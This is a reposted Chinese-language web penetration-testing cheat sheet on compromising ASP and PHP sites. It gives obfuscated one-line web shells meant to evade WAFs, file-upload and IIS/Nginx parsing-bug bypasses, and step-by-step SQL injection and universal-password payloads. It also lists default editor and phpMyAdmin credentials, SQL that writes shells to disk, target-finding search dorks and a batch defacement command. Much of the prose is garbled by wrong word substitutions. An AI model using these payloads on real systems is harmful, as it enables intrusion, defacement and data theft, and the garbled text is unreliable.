ACCESS渗透测试笔记 转载

【 拿shell 】

 1.直接上传asp asa jsp cer php aspx htr cdx
格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls

 2.臻污染图片木马遇到拦截系统,连图木马都达到传不了,记事本打开图片木马在代码最前头加上gif89a,一般就能逃过拦截系统了。

 3.上传图片木马把地方复制到数据库备份里备份成asp木马,有时无成事就使IIs6.0解析漏洞尝试突破。

 4.直达污染图片木马再就此抓包工具进行查扣包,用明小子的概括及传功能,复制上传地址和cookies填到对应之框里,点击上传即可。

 

5.当后台有数据库备份蛋没有直达传点时,把一句话木马插到任意处,再到数据库备份里备份成asp木马,之后用平等词话客户端连接木马即可。

6.继令点击修改密码,新密码设置也:1″:eval
request(“h”)’设置成后总是asp/config.asp即可拿下shell

 7.当页面提示“上传格式不得法[重上传]”
则说明存在上传漏洞,复制地址放到明小子里及传,一般还能够一直下shell。

 8.当后台从未数据库备份但来数据库恢复的情况下,请不要犹豫,数据库恢复和数据库备份功能是千篇一律的,直接邪恶吧。

 9.如果知道网站的数据库是asp的,直接在前台找留言板插入一句话木马,连接配置文件inc/config.asp即可拿下shell。

10.当网站前台来“会员注册”
注册一个账户上看看发生无来高达传点,有的言语一直上传asp木马以及采取iis6.0解析漏洞,不行就逮捕包用明小子上传。

11.先期上污染一个.ashx之文本,在速记里搜寻可找到办法,结果是访问会生成一句话木马文件,后台上污染、编辑器上传、上污染漏洞页面都只是使用这个措施。

12.当页面提示只能上传jpg|gif|png等格式的下,右键查看源文件,本地修改也asp|asa|php再本地上传即可拿下shell。

13.当用啊D检测注入点提示SA权限或DB权限的当儿,尝试列目录找到网站物理路径,再点击cmd/上污染,直接上传asp木马即可,不行就别备份拿shell。

14.对有些达成污染漏洞的上传页面,以及后台找到的上传页面,可以品尝用当地双文书及污染突破,第一独选jpg第二个选cer,推荐用火狐浏览器。

=============================================================================================================================================================

【 渗透技巧 】

1.或多或少cms的网站设置过滤不严,直接以网站后长admin/session.asp 或
admin/left.asp 可以绕了后台验证直接进后台。

2.提生服务器之后建议抓下管理员哈希值,然后去所有用户包括团结的,以后登录就台服务器即就此管理员的账号密码登录,这样于安全。

3.入侵网站之前连下3389,可以连续不断上之说话先品尝弱口令,不行就按5糟糕shift键,看看发生无发生shift后门。

4.拜访后台地址时弹有提示框“请登陆”
把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选–查看即可直接入后台。

5.突破防盗链系统访问shell代码:javascript:document.write(“<a
href=’http://www.xxx.com/uploadfile/1.asp‘>fuck</a>”)
点击GO即可进shell。

6.相见一流信息监控拦截系统时,上传图片木马或是在木马代码最前加上gif89a即可规避了检测。

7.eweb编辑器后台,增加了asp|asa|cer|php|aspx等扩大名上传时都被过滤了,尝试增加一个aaspsp,再上传asp就会分析了。

8.用注入工具猜解到表段却猜解不顶字段的时刻,到网站后台右键查看源文件,一般账号密码后面的哪怕是字段,之后于流工具里添加配段进行猜解即可。

9.当注入工具猜解表段,但猜解字段经常提醒长度逾50之类,不妨扔到穿山甲去猜解一下。

10.得知表段跟字段之后,使用SQL语句以ACCESS数据库里加个用户名及密码的语句:Insert
into admin(user,pwd) values(‘jianmei’,’daxia’)

11.当得到管理员密码可未掌握管理员帐号时,到网站前台找新闻链接,一般“提交者”“发布者”的名就是管理员的帐号了。

12.爆破ASP+IIS架设的网站web绝对路径,假而网站主页也:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是休有的。

13.有的站长很疲劳什么吧不改,当我们意识到网站的cms的下,不妨去下充斥同模仿找找数据库路径,以及敏感信息,再品尝默认相关的而是采取资源。

14.菜刀里点击一句话木马右键,选择虚拟机终端,执行命令出现乱码时,返回去设置编码那里,将默认的GB2312改呢UTF-8.

15.入侵千万转忘了ftp,试试诺口令,ftp的默认端口:21  默认帐号密码:test

16.破解出md5为20个结果,只需要将前三位以及晚一样号去丢,剩余16各类将去解密即可

17.众多网站的后台地址是:admin_index.asp manage_login.asp

18.有常于木马代码里丰富了gif89a,上传成功访问的上却出现了例如图相同的缪图像,说明服务器将gif89a当做图片来处理了,不要带gif89a即可。问便好了。

19.物色eweb编辑器的时,如果默认的叫改动了,到前台去寻觅图片右键看下路,根据图片的目猜eweb编辑器的目,后台也是用这个思路。

20.IIS报表全版本泄漏用户路径和FTP用户称漏洞:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual
Roots\

21.扫旁站的时候,是无是想念看每个站点是啊cms呢?用轩辕剑扫描就可来得系统特性。

22.网站的主站一般都死安全,这时就要旁注或C段了,但是想了解各个IP段开放了啊端口吗?用“啊D网络工具包”里面的IP端口扫描最帅了。

23.手工检测注入点弹有“你的操作都为记录!”之类的信,访问是文件:sqlin.asp,如果存在,在注入点后面栽入一词话木马:‘excute(request(“TNT”))
继而用同句子话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为许多防注入程序还是用”sqlin.asp“这个文件称来举行非法记录之数据库。

24.有的后台不显验证码,往注册表里添加一个ceg即可突破这困境了,把脚的代码保存也Code.reg,双击导入就得了。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\Security]
“BlockXBM”=dword:00000000

25.内网渗透时尽量少登录3389,以免被管理员发现;

26.旁注底下,建议挑php的站点来日,因为php站点一般还支持aspx脚本,这样于提权跟跨目录都轻松.!

 

=============================================================================================================================================================

【 手工注入 】

IE浏览器-工具-Internet选项-高级-显示自己HTTP错误信息前面的滋生去丢,否则不论服务器返回什么错,IE都只有显示为HTTP
500服务器错误,不能够收获更多的音。

手工注入时如网站过滤了 and 1=1  and 1=2 ,可以据此xor 1=1  xor 1=2
进行判断。

先是步:找注入点

(数字型)http://www.xxx.com/show.asp?id=7

加以’           程序报错

加and 1=1     返回正常页面

加and 1=2     返回错误页面

(字符型)http://www.xxx.com/show.asp?id=ade7

加’            程序报错

加’and ’1′=’1  返回正常页面

加’and ’1′=’2  返回错误页面

时检测注入点的艺术:

每当URL地址后长-1,若返回的页面和前面不同,是外一个正常化的页面,则意味着有注入漏洞,而且是数字型的流入漏洞。

以URL地址后长-0,若返回的页面及事先的页面相同,然后加上-1,返回错误页面,则为代表有注入漏洞,而且是数字型的。

要是报错提示此:

Microsoft JET Database Engine 错误 ’80040e14′

语法错误 (操作符丢失) 在询问表达式 ‘ID = 6 ord by’ 中。

/fun/Function.asp,行 657

解明:通过 JET 引擎连接数据库,则是 Access数据库,通过 ODBC
引擎连接数据库,则是 MSSQL数据库。

 

其次步:猜字段往往

语句:order by 5

倘猜6的早晚回来出错,就延续往回猜,直到回到正确吧止…

第三步:UNION命令

语句:and 1=2 union select 1,2,3,4,5–

望哪好替换,假如显示有2,就在2这边替换SCHEMA_NAME,见下

第三步:猜库名

语句:and 1=2 union select 1,SCHEMA_NAME,3,4,5 from
information_schema.SCHEMATA limit 1,1

第四步:猜表段

语句:and 1=2 union select 1,TABLE_NAME,3,4,5 from
information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit
1,1

注意,TABLE_SCHEMA=后面的库名必须是hex转换了之格式,倒数第二独1直接替换,直到爆出有表段,然后选取最可能的特别。

第五步:猜字段

and 1=2 union select 1,COLUMN_NAME,3,4,5 from 
information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1

注意,TABLE_SCHEMA=后面的表段必须是hex转换了的格式,倒数第二只1直替换,直到爆出有字段,然后选择最可能的那么片只。

第六步:猜内容

语句一:and 1=2 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
from admin

第一为程序报错,所以于注入点后面长 and 1=2

语句二:http://www.xxx.com/show.asp?id=-178 union select
1,2,3,4,5,6,7,8,9,10,11,12 from admin

同等是先行给程序报错,在178这参数前面加上 –

当列名帐号与列名密码都猜解对的当儿,页面将会晤显示相呼应的内容,一般的密码都经MD5加密了,解密地址:http://www.cmd5.com/%C2%A0; 
UserName  Password

=============================================================================================================================================================

【 常见网站程序 】

asp类:

foosun(风讯)

kesion(科汛)

 

newasp(新云)

乔客

 

CreateLive(创力)

5uCMS

 

KingCMS

DvBBS(动网)

BBSxp

 

[博客]zblog

[博客]pjblog

PHP类:

DeDeCms(织梦)

ECMS(帝国)

PHPCMS

PHP168

HBcms(宏博)

 

SupeSite

CMSware(思维)

 

Joomla!

[BBS]Discuz!

[BBS]phpWind

 

[SNS]UCenterHome

[SNS]ThinkSNS

 

[商城]EcShop

[商城]ShopEx

 

[博客]WordPress

[维基]HDWiki

[微博]PHPsay

 

[DIGG]PBdigg

( php开源mysql绝对路径 )

开源系统             数据库配置文件名                 
文件称所当的目
Discuz!              config.inc.php                    ./
config.inc.php
Phpcms               config.inc.php                   
./include/config.inc.php
Wodpress             wp-config.php                     ./
wp-config.php
Phpwind              sqlconfig.php                    
./data/sqlconfig.php
phpweb               config.inc.php                   
./config.inc.php
Php168v6             mysql_config.php                  ./php168/
mysql_config.php
Shopex               config.php                       
./config/config.php
Ecshop               config.php                       
./data/config.php
Joomla               configuration.php                 ./
configuration.php
UCenter              config.inc.php                   
./data/config.inc.php
EmpireCMS            config.php                       
./e/class/config.php
Dedecms              common.inc.php                   
.data/common.inc.php
Zen Cart             configure.php                    
./includes/configure.php
Mediawiki            localsettints.php                
./config/localsettints.php
Ecshop               config.php                       
./data/config.php
osCommerce           configure.php                    
./includes/configure.php

=============================================================================================================================================================

【 谷歌黑客语法 】

site:可以限制而寻找范围之域名.

inurl:用于搜索网页上含蓄的URL,这个语法对找网页上之追寻,帮助之类的要命有用.

intext:
只摸网页<body>部分被富含的契(也尽管是忽视了标题、URL等之亲笔)

intitle: 查包含关键词之页面,一般用于社工别人的webshell密码

filetype:搜索文件的后缀或者扩展名

intitle:限制而寻找的网页标题.

link: 可以收获一个持有包含了某个指定URL的页面列表.

觅后台地址:site:域名
inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

摸文本内容:site:域名
intext:管理|后台|登陆|用户名|密码|验证码|系统|帐声泪俱下|admin|login|sys|managetem|password|username

检索可注入点:site:域名 inurl:aspx|jsp|php|asp

找寻上传漏洞:site:域名 inurl:file|load|editor|Files

找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

是的数据库:site:域名 filetype:mdb|asp|#

翻看脚本类型:site:域名 filetype:asp/aspx/php/jsp

因循守旧回策略入侵:inurl:cms/data/templatesindex/

动谷歌黑客快速找到好想只要之素材:site:qiannao.com 提权视频

=============================================================================================================================================================

【 一句话木马 】

asp一句话木马:<%eval request(“x”)%>

php一句话木马:<?php eval($_POST[g]);?>

aspx一句话:<%@ Page
Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>

数据库加密一句子话(密码a):┼攠數畣整爠煥敵瑳∨≡┩愾

网站配置、版权信息专用一句子话:”%><%Eval Request(x)%>

一样句话再次过护卫神:<%Y=request(“x”)%> <%execute(Y)%>

过拦截一句话木马:<% eXEcGlOBaL ReQuEsT(“x”) %>

asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%

会过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的平等句话:<%Y=request(“x”)%> <%eval(Y)%>

elong过安全狗的php一句话:<?php  $a = “a”.”s”.”s”.”e”.”r”.”t”; 
$a($_POST[cc]);  ?>

后台常用写副php一词话(密码x):

<?
$fp = @fopen(“c.php”, ‘a’);
@fwrite($fp,
‘<’.’?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”);
@fclose($fp);
?>

 

高强度php一句话:

<?php
substr(md5($_REQUEST[‘heroes’]),28)==’acd0′&&eval($_REQUEST[‘c’]);?>

最新变异PHP一句话(密码b4dboy):

($b4dboy = $_POST[‘b4dboy’]) &&
@preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

 

突破安全狗的aspx一词话:

<%@ Page Language=”C#” ValidateRequest=”false” %>
<%try{
System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”,
true, System.Reflection.BindingFlags.Default, null, new object[] {
this }, null, null); } catch { }%>

 

突破护卫神,保护盾一句子话:

<?php $a = str_replace(x,””,”axsxxsxexrxxt”);
$a($_POST[“test”]); ?>

 

过剩网页程序都不允许包含〈%%〉标记符号的情节之文书上传,这样一句话木马就写副不上前数据库了。

改成:〈scriptlanguage=VBScript runat=server〉execute
request(“l”)〈/Script〉

这样即便逃了利用〈%%〉,保存为.ASP,程序依然执行的功力是一模一样的。

 

PHP高强度一词话:

<?php
substr(md5($_REQUEST[‘x’]),28)==’acd0′&&eval($_REQUEST[‘c’]);?>  
菜刀连接:/x.php?x=lostwolf  脚论项目:php  密码:c

<?php assert($_REQUEST[“c”]);?>    菜刀连接 躲避检测 密码:c

=============================================================================================================================================================

【 解析漏洞总结 】

IIS 6.0

目解析:/xx.asp/xx.jpg  xx.jpg可替换为擅自文本文件(e.g.
xx.txt),文本内容吧后门代码
IIS6.0 会将 xx.jpg 解析为 asp 文件。
后缀解析:/xx.asp;.jpg     /xx.asp:.jpg(此处需抓包修改文件称)
IIS6.0 都见面拿该类后缀文件成功解析为 asp 文件。
默认解析:/xx.asa    /xx.cer   /xx.cdx
IIS6.0 默认的可执行文件除了 asp 还蕴藏这三栽
这里可沟通下目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或
xx.asa;.jpg

 

IIS 7.0/IIS 7.5/Nginx <8.03

每当默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将
/xx.jpg/xx.php 解析为 php 文件。
常用利用方式: 将平摆设图与一个写入后门代码的公文文件合并
将恶意文本写副图片的次上制代码之后,避免毁坏图片文件头和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即第二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件
yy.txt 内容 <?PHP fputs(fopen(‘shell.php’,’w’),’<?php
eval($_POST[cmd])?>’);?>
意思为写副一个情节吧 <?php eval($_POST[cmd])?>
名称为shell.php的文件
搜个地方及传 xy.jpg ,然后找到 xy.jpg 的地方,在地点后长 /xx.php
即可实施恶意文本。
.然后哪怕以图纸目录下生成一句话木马 shell.php 密码 cmd

=============================================================================================================================================================

【 ewebeditor编辑器 】

默认后台:ewebeditor/admin_login.asp

帐号密码:admin admin

体设计:ewebeditor/admin_style.asp

翻版本:ewebeditor/dialog/about.html

数据库路径:db/ewebeditor.mdb    db/%23ewebeditor.mdb   
db/%23ewebeditor.asp  ewebeditor/db/!@#ewebeditor.asp
(用谷歌语法找文件称)

遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir
=../..

跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=..  (dir为列目录,
..也回到上层目录),形式:dir ../..

接触达到传文书管理-随便选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14
在id=14后头加&dir=../../../.. 就只是视整个网站的文本了(../自己加减)

 

( ewebeditor5.5版本 )

默认后台:ewebeditor/admin/login.asp

帐号密码:admin  198625

数据库路径:data/%23sze7xiaohu.mdb

遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup

 

( ewebeditor3.8 php版本 )

默认后台:eWebEditor/admin/login.php

先是随便输入一个帐号与密码,接着系统会唤起出错,这时清空浏览器的url,然后输入以下代码后连本三糟回车键:

javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));

接着访问文件:ewebeditor/admin/default.php  就可直接进后台了。

 

( ewebeditor编辑器exp手册 )

有时什么后缀都上污染了,还是坏。就充实一个asp:jpg格式 上传asp:jpg 试试

同等:文件及污染成了,但是看不成事,说明该目录(比如:/UploadFile)被装置了权,返回去换成/
上传根目录就执行了.增加asp等充分的上,可以下解析asp;jpg

 

老二:下载数据库查看前人留下的印痕,再拜达到传页面拿shell。

页面路径:/ewebeditor.asp?id=48&style=popu7
用工具浏览数据库找到已经添加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在说话里看,上传相对应的格式木马。

 

=============================================================================================================================================================

【 fckeditor编辑器 】

翻看版本:fckeditor/editor/dialog/fck_about.html

                  FCKeditor/_whatsnew.html

编辑器页面:FCKeditor/_samples/default.html

上传页面:fckeditor/editor/filemanager/connectors/test.html

                 /editor/editor/fckeditor.html

               
FCKeditor/editor/filemanager/connectors/aspx/connector.aspx

               FCKeditor/editor/filemanager/connectors/uploadtest.html

遍历目录:FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

编纂页面:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

翻看文件及传路径:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

 

( 拿shell方法总结 )

ASPX的立几都用fck编辑器,建议用工具扫一下,记住inc目录下或者在fck编辑器,扫下这个目录。

同等:如果是iis6.0,上传两差 1.asp;.jpg 或者1.asp;1.jpg
或者创造x.asp目录,再以此目录下上污染x.jpg 或者直接上传1.asp;jpg
都好全面解析拿下shell

第二:第一不好上传1.asp;1.jpg,被再次命名吧:1_asp;1.jpg,但是第二涂鸦上传1.asp;1.jpg,就出或成:1.asp;1(1).jpg

其三:iis7.5+fck的解析文件为:a.aspx.a;.a.aspx.jpg..jpg.aspx

季:如果无是iis6.0
上污染1.asp;jpg然后抓包,接下去改包,将分店变成空格,再就此c32将20转成00,保存,利用%00
截断分号两软

五:成功访问别人的同一句子话木马页面,http://glavesoft.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg 
但未知道密码
http://glavesoft.com/UploadFiles\EditorFile\file\2_asp;2.jpg
这个是图表木马,没有中标运用iis6.0解析漏洞或图片,下载下来用记事本打开找到密码。

六:IIS7.0/7.5
通杀oday,把php一句话木马后缀改成为1.jpg招上,找有一致句话的路子后,在1.jpg的末尾添加/.php 
例如:http://www.xxx.com/iges/php.jpg/.php

 

( 建立文件夹 . 变 _ 的突破艺术 )

下Fiddler web debugger 这款工具来开展修改数据包,从而达到突破之目的。

专注:安装Fiddler web
debugger,需要安装.net环境和.net的SP2补丁方可运行!

1.开辟fck的上传页面,例如:fckeditor/editor/filemanager/browser/default/connectors/test.html

2.更打开Fiddler web debugger这款工具,点击设置–自动断点–选择 “请求之前”

3.随之打开fck的上传页面,创建文件夹,并输入而想如果开创的文书称,例如:x.asp

4.然晚赶回到Fiddler web debugger这款工具里,选择链接–点击右侧的嗅探

5.修改currentfolder内的参数,改成为你要是成立的文本夹名字,如:x.asp

6.然后点击右侧的:run to completion

7.还点击软件设置–自动断点–禁用,再至浏览器里点击确定建立文件夹,你尽管会意识文件夹建立为x.asp了

=============================================================================================================================================================

 

【 linux 】

解析格式:1.php.xxx (xxx可以是自由)

如apache不认识后缀为rar的文书,我们便因故1.php.rar格式上传,文件就见面让服务器当做PHP脚本解析。

识假linux系统方法,例如:http://www.xxx.com/xxx/abc.asp?id=125 把b换成雅写B访问,如果差了,就证实是linux系统,反的是windows系统.

=============================================================================================================================================================

【 旁注 】

旁注的技巧就是是选取支持aspx的站来天,这样提权时候希望于充分,如何探测服务器上什么站点支持aspx呢?
利用bing搜索:http://cn.bing.com/ 搜索格式:ip:服务器ip aspx

遵照要入侵一个网站,想明白该网站开发非支持aspx,就当网站后随便加上一个xxx.aspx回车,如果显示的不是iis默认的左页面,而是这种:“/”应用程序中之服务器错误,说明支持aspx马。

=============================================================================================================================================================

【 phpmyadmin 】

翻开版本:test.php 或 phpinfo.php

默认账号密码:root root

万克帐号密码:’localhost’@’@” 密码空

拿shell第一种植方式:
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (‘<?php
@eval($_POST[pass]);?>’);
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE
‘d:/wamp/www/darkmoon.php’;
DROP TABLE IF EXISTS `darkmoon`;

 

拿shell第二栽办法:
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘<?php
@eval($_POST[pass]);?>’);
select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;
Drop TABLE IF EXISTS moon;

拿shell第三栽方式:
select ‘<?php @eval($_POST[pass]);?>’INTO OUTFILE
‘d:/wamp/www/darkmoon3.php’

拿shell第四种办法
select ‘<?php echo \’<pre>\’;system($_GET[\’cmd\’]);
echo \’</pre>\’; ?>’ INTO OUTFILE
‘d:/wamp/www/darkmoon4.php’
127.0.0.1/darkmoon4.php?cmd=net user

找到mysql数据库,执行sql语句即可写副一句话,再菜刀连接即可。

phpmyadmin脱裤:在就中间是足以直接拖库的,如同上传php拖库脚本一样,操作多的。

 

修改mysql默认的root用户称道:

进入phpmyadmin,进入mysql表,执行sql语句

1.update user set user=’你的新root用户名’ where user=’root’;
2.flush privileges;

例如:

据此root身份登入,进入mysql库,修改user表即可。
1.use mysql;

  1. 3.mysql>update user set user=’newName’ where user=’root’;
  2. 5.mysql> flush privileges;

=============================================================================================================================================================

【 万能密码 】

( php )

帐号:’ UNION Select 1,1,1 FROM admin Where ”=’
密码:1

( asp )

‘xor

‘or’=’or’

‘or”=”or”=’

‘or ’1′=’1′or ’1′=’1

‘or 1=1/*

=============================================================================================================================================================

【 批量关键词 】

inurl:asp?id=
inurl:detail.php?
CompHonorBig.asp?id=           牛比
inurl:show.asp? 非常强劲!!!!
site:www.yuming.com
inurl:articleshow.asp?articleid=数字 牛B
inurl:szwyadmin/login.asp
inurl:asp?id=1 intitle:政府
杭州 inurl:Article_Class2.asp?

=============================================================================================================================================================

【 批量挂黑页 】

cmd命令执行 dir d:\wwwroot /b >>1.txt

日后命令 for /f “tokens=* delims= ” %i in (d:\1.txt) do echo
pause>>D:\wwwroot\%i\wwwroot\1.txt

=============================================================================================================================================================

【 木马后门 】

1.TNTHK小组中版 ——
存在重大词后门,随便输入一个错的密码,右键查看源文件,找到错误主要词后面的font,在font后面的哪怕是科学密码。

2.不灭之魂—不深僵尸变种 ——
用这款工具专门爆这款大马的密码:爆不灭之魂密码

3.终极防删免杀多效益VIP版本-无后门 —— 万能密码:wbgz   菜刀连接:kk

=============================================================================================================================================================

【 安全狗 】

1.过注入

方法一:a.asp?aaa=%00&id=sql语句

方二: a.asp?id=sql语句   里面将平安过滤的加个%l 比如: un%aion
sel%aect 1,2,3,4 fr%aom admin

2.过大马受阻止访问

主意一致:上传一个大马 然后拜http://sss.com/dama.asp%C2%A0;
访问后出现阻挠。

那么解决办法 先将dama.asp改名dama.jpg上传,然后于与目录及传个文件da.asp
内容吧: <!–#include file=”dama.jpg” –>  这样又拜访da.asp 
就无见面受阻碍了。

3.了菜刀连接一句话让挡住

方式同样:不用菜刀连接一句子话,用别的一句话连接端。

道二:中转下连续菜刀,把过滤掉的词替换掉。

=============================================================================================================================================================

【 asp搜索框注入 】

当搜索框里,我们输入一个主要词,该要词要于斯站能搜索到消息。比如是站我输入了1,搜索到了诸多资讯,判断这个搜索框是否生渗漏动。

直接当前台的查找框里注入被拘以来,可以本地构造表单进行注入:

<html>
<form name=”form1″ method=”post”
action=”http://www.xxx.com/search.asp“>
类型:
<label>
<input name=”t” type=”text” id=”t” value=”1″>
</label>
<p>
内容:
<label>
<input name=”key” type=”text” id=”key”>
</label>
</p>
<p>
<label>
<input type=”submit” name=”Submit” value=”提交”>
</label>
</p>
</form>

1%’ ‘ and ‘%’=’         系统报错

1%’ and 1=1 and ‘%’=’   返回正确

1%’ and 1=2 and ‘%’=’   返回错误

1%’ and (select count(*) from 表段) and ‘%’=’   猜表段

1%’ and (select count(字段) from 表段) and ‘%’=’  猜字段

1%’ and (select top 1 len(字段) from 表段)>16 and ‘%’=’  猜字段长度

1%’ and (select top 1 asc(mid(name,1,1)) from 表段)>97 and ‘%’=’  
猜内容

故而牛族字符转换器转换数字。(猜长度的时候,选择针对性之先头那个错的数字!或是直接拿超过号转吗当号,看看是就是了)

一些网站存在搜索框,利用这搜索框进行注射用爆出管理帐号密码:%’ and
1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’=’

咱在搜索框里,搜索关键词1浏览器地址栏显示:http://www.XXXXXX.com/News\_search.asp?key=1&otype=msg

这里的key=1,就是说我们寻找得要词1,我们而开的便是将key=1放到最后面,把连接成:http://www.XXXXXX.com/News\_search.asp?otype=msg&key=1

要直接把&otype=msg删除,变成:http://www.XXXXXX.com/News\_search.asp?key=1

=============================================================================================================================================================

【 本地构造上传漏洞  】

找寻程序上传漏洞,必须由上传页面的源文件入手,目标发出点儿个:

1.filename (文件名称) 
在上传页面被针对文件扩展名过滤不严,从而上传可执行之本子木马。
2.filepath (文件路径) 
在上传页面针对路径过滤不严,导致可以改及传相对路径上传脚本木马。

当检测及一个直达传页面,asp、asa后缀已经为过滤掉的当儿,可以尝尝抓捕包明小子或NC上污染!

雅就动用当地及污染漏洞构造上传!例如上传页面是:http://www.baidu.com/upfile_other.asp

1.右侧键查看源文件,找到这段代码:<form name=”form1″ method=”past”
action=”zwhua_upload1.asp” enctype=”multipart/form-data”>

  把上述代码中actino处的不二法门上全!即:<form name=”form1″
method=”past” action=”http://www.xxx.com/zwhua_upload1.asp”
enctype=”multipart/form-data”>

2.复找到这段代码:<input type=”hidden” name=”filepath”
value=”uploadfile/”>

  用IIS6.0解析漏洞,把上述代码中value处的文件上全!即:<input
type=”hidden” name=”filepath” value=”uploadfile/1.asa; “> 
注意:冒号后面有空格!

3.随着保存也1.html,将正保存的文件拖上去C32里,选择十六进制模式,找到“1.asa;
”后面的空格,将那个填写为00晚保存退出!

4.本地打开上污染图片格式的木马(不成功时可尝试上污染一模一样句话木马)
,如果提示成功后非形路径的语句,可以右键查看源文件自己手工找有路径访问即可!

=============================================================================================================================================================

【 利用双文件上传拿shell 】

为网站仅仅看清一致糟糕,如果第一独文本后缀是在白名单中的话,就给那个上传,并无看清第二只公文,所以上传任意格式的公文呢被那个通过。

当系统验证cookie的早晚,就要用到火狐浏览器了,登录网站上后台,让火狐浏览器保存管理员的cookie值,再管修改后的“双文书上传工具”拖进来上传。

1.以后台检索达传点,右键查看源文件,找到上传地址,一般在post或action的附近,搜索即可找到,一般为:src=”../xxx.htm” 
之后续全路线访问。

2.之还无是确实的上传页面,真正的上传页面后缀是asp的,继续查看源代码,找到action=”xxx.asp”,补全路线访问即可!

4.其实也得抓包从而取得上传路径,抓包之后,在Referer:这栏,还有广阔的凡:htto://www.xxxx.com/upfile_other.asp

3.开辟双文件上传工具,替换为眼前之上传地址,保存后拖进火狐浏览器里,第一个选择jpg木马,第二单选项cer木马,提交后右手键查看源文件找有路径即可。

=============================================================================================================================================================

【 数据库备份抓包改包NC提交拿shell 】

当备份路径不克改改,后缀又是mdb不变的时候,我们只是先对备份的经过进行追捕包,再本地构造用NC提交即可突破备份,数据库恢复为可采用是方式!

以抓包的下,最好用火狐浏览器,因为部分浏览器抓匪交保证,首先上传一模一样张图片木马复制下地址,接着对备份过程进展搜捕包!把办案到之数据复制在文书中!

开本地修改,先拿POST处补全网址,找到最好下面的一条龙数,再复制多一行对比长度进行改动,把备份的数量称替换为木马地址,备份的名变更也祥和想只要的asp后缀!

更以原先的数量长度及现在之对比同时替换掉,最后看共加了有些个字符,就在Content-Length:处进行增减,用NC提交数据格式:nc
域名 80<1.txt

=============================================================================================================================================================

【 本地构造数据库备份突破拿shell 】

当上传jpg木马得到路径前失去备份时,发现数库备功能因此无了底情形下,可以尝试本地构造突破拿shell!

率先查看源文件,找到“当前数据库路径”修改也正上传jpg木马的路线,再找到“数据库备份名称”修改也1.asa

找到“<form method=”past” action=”Backup.asp?action=Backup”>”
将路径补全“<form method=”past”
action=”http://xxx.com/admin/Backup.asp?action=Backup“>”

终极保存也1.html,有的网站不验证cookie的口舌,直接打开进行备份就能够成功了,但是一般还要验证cookie,这时就因故上火狐浏览器了。

因为火狐浏览器有保留cookie的效果,先登录后台,以管理员的权限进行上传,直接将1.html拖进火狐浏览器里,直接点击备份即可突破cookie验证!

=============================================================================================================================================================

【 本地构造限制及传类型漏洞 】

相似用于直扫到之上传页面,名称是:上传图片,上传asp、asa等剧本时提醒“请捎jpg或gif文件!”

这儿通过者法一般还能够成功,首先保存至当地1.asp 
放到多少旋风的目下,然后找到以下即段代码:

    alert(“请点击浏览按钮,选择而若达成传的jpg或gif文件!”)
myform.file1.focus;
return (false);
}
else
{
str= myform.file1.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=”.jpg” && extname!=”.gif”)
{
alert(“请选择jpg或gif文件!”);

来看就词代码:if(extname!=”.jpg” && extname!=”.gif”)  改为:   
if(extname!=”.jpg” && extname!=”.gif” && extname!=”.asp”)

下一场上完整上传地址,action=这里,然后网页打开127.0.0.1
直接上传asp文件就可以了。

=============================================================================================================================================================

【 抓包改包NC提交拿shell 】

1.拘役包数据中一经是name=”filepath”或是name=”filename”,那么就是足以满足NC的上传条件了。

2.将木马的抓包数据复制到文本文件中。例如:1.txt

3.将路径补全:

filepath截断法:
uploadfile/路径后上加1.asp空格 (16进制下面用20改成吧00)

filename自定义名称:
C:\Documents and Settings\lei\桌面\1.jpg (将1.jpg 改呢
1.asp空格,16前行制下将20改动也00)

